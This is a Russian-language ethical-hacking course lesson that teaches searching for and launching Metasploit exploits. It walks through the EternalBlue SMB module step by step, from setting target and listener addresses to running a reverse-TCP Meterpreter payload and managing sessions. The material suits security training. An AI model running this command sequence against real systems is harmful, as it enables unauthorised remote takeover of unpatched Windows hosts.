Поиск и использование эксплойтов
Поиск и запуск
«Поиск и использование эксплойтов» — бесплатный урок Ethical Hacking Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Ethical Hacking Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Ethical Hacking Academy содержит 4 уроков всего.
От разведки к эксплуатации
После сканирования вы знаете службы и версии на цели. Следующий шаг — найти модуль эксплойта, соответствующий известной уязвимости в этих версиях.
Команда search в Metasploit открывает доступ к тысячам модулей. Точный поиск экономит время и помогает не запускать неподходящий код.
Основы поиска
Команда search выполняет поиск по индексу модулей с использованием ключевого слова. Можно искать по названию программного обеспечения, CVE или службе.
search eternalblue
search type:exploit platform:windows smbФильтры поиска
Уточняйте результаты с помощью фильтров:
- type: exploit, auxiliary, post.
- platform: windows, linux, unix.
- cve: конкретный идентификатор CVE.
- rank: excellent, great, good (надёжность).
Сочетание фильтров быстро сокращает тысячи модулей до нескольких подходящих.
search cve:2017-0144 type:exploitЧтение результатов поиска
В результатах поиска для каждого модуля указаны рейтинг, дата раскрытия и индикатор проверки. Рейтинг отражает надёжность и безопасность эксплойта.
- excellent: вероятность сбоя цели мала.
- great/good: надёжен при распространённых условиях.
- low/manual: рискован или требует тщательной настройки.
Отдавайте предпочтение модулям с более высоким рейтингом, чтобы не вызвать сбой в рабочих системах.
Загрузка модуля
Используйте порядковый номер модуля или полный путь вместе с use. Приглашение меняется и показывает загруженный модуль, а хранилище данных теперь содержит параметры этого модуля.
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >Изучение модуля
Перед запуском изучите модуль. Команда info показывает описание, ссылки на источники (CVE и рекомендации по безопасности), обязательные параметры и поддерживаемые цели.
Понимание назначения модуля — часть профессионального и ответственного использования; никогда не запускайте эксплойт, которого Вы не понимаете.
info
show options
show targetsНастройка параметров
Настройте обязательные параметры с помощью set. Для удалённого эксплойта обычно требуются адрес цели и параметры полезной нагрузки.
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2Команда проверки
Многие эксплойты поддерживают команду check, которая безопасно проверяет, выглядит ли цель уязвимой, не выполняя сам эксплойт.
Сначала запустить check — хорошая практика: это снижает риск сбоя системы и подтверждает, что Вы собираетесь потратить усилия на реальную возможность.
check
# [+] 10.10.10.40:445 - The target is vulnerable.Выбор полезной нагрузки
Эксплойту нужна полезная нагрузка. Metasploit выбирает вариант по умолчанию, но Вы можете вывести список и выбрать вариант, подходящий для цели и требуемого уровня доступа.
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpЗапуск и сеансы
Запустите эксплойт с помощью exploit (или run). В случае успеха Вы получите сеанс — интерактивное соединение с целью.
Управляйте несколькими сеансами с помощью sessions -l, чтобы вывести их список, и sessions -i N, чтобы взаимодействовать с одним из них. Переведите сеанс в фоновый режим командой background, чтобы продолжить работу в консоли.
exploit
sessions -l
sessions -i 1Глобальные и модульные параметры
Некоторые параметры, например LHOST, используются повторно во многих модулях. Задайте их глобально с помощью setg, чтобы не вводить их заново при каждом переключении модуля.
set: применяется только к текущему модулю.setg: применяется глобально во всех модулях.unsetg: удаляет глобальное значение.
Это экономит время при длительных проверках с большим количеством модулей.
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40Быстрая проверка
Выберите ответственный шаг перед запуском эксплойта.
Итоги
Вы научились находить и запускать эксплойты:
- Используйте поиск с фильтрами (тип, платформа, cve, рейтинг), чтобы находить модули.
- Для надёжности и безопасности отдавайте предпочтение модулям с более высоким рейтингом.
- Используйте загрузку для загрузки, сведения/показ параметров для изучения и настройку для конфигурации.
- Сначала запускайте проверку, а затем эксплойт, чтобы получить сеанс.
- Управляйте сеансами с помощью sessions -l/-i.
Далее: полезные нагрузки и оболочка Meterpreter для действий после эксплуатации.
Часто задаваемые вопросы
Урок «Поиск и использование эксплойтов» бесплатный?
Да — полный текст урока «Поиск и использование эксплойтов» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Ethical Hacking Academy, подпишись на CoddyKit PRO. Курс Ethical Hacking Academy содержит 4 уроков всего.
Чему я научусь в уроке «Поиск и использование эксплойтов»?
Поиск и запуск Ты практикуешь Ethical Hacking Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Ethical Hacking Academy?
Предыдущий опыт не требуется. Ethical Hacking Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.
Сколько времени занимает урок «Поиск и использование эксплойтов»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Ethical Hacking Academy?
Да. Каждый урок Ethical Hacking Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit
- Поиск и использование эксплойтов
- Полезные нагрузки и Meterpreter
- Модули постэксплуатации